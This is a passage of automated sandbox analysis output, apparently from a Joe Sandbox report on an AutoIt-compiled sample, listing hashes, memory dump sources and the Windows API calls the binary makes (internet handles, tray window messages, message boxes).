                                                                                                • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: InternetOpen
                                                                                                • String ID: <local>
                                                                                                • API String ID: 2038078732-4266983199
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock_memmove
                                                                                                • String ID: EA06
                                                                                                • API String ID: 1988441806-3962188686
                                                                                                APIs
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: u,D
                                                                                                • API String ID: 4104443479-3858472334
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • wsprintfW.USER32 ref: 0045612A
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: MessageSend_mallocwsprintf
                                                                                                • String ID: %d/%02d/%02d
                                                                                                • API String ID: 1262938277-328681919
                                                                                                APIs
                                                                                                • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                • InternetCloseHandle.WININET ref: 00442668
                                                                                                  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                • String ID: aeB
                                                                                                • API String ID: 857135153-906807131
                                                                                                APIs
                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                • String ID: Shell_TrayWnd
                                                                                                • API String ID: 529655941-2988720461
                                                                                                APIs
                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                • String ID: Shell_TrayWnd
                                                                                                • API String ID: 529655941-2988720461
                                                                                                APIs
                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: Message_doexit
                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                • API String ID: 1993061046-4017498283